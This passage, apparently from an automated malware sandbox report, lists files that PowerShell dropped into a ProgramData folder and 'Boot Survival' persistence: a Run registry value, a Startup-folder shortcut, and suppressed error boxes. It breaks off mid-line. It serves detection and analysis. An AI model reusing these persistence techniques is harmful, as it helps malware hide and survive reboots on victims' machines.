    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\libeay32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\borlndmm.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\CrystalNet-LTD@b52\bin.exe

    Boot Survival:

    Creates autostart registry keys with suspicious names
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run computer
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CrystalNet-LTD@b52.exe.lnk
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
    Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess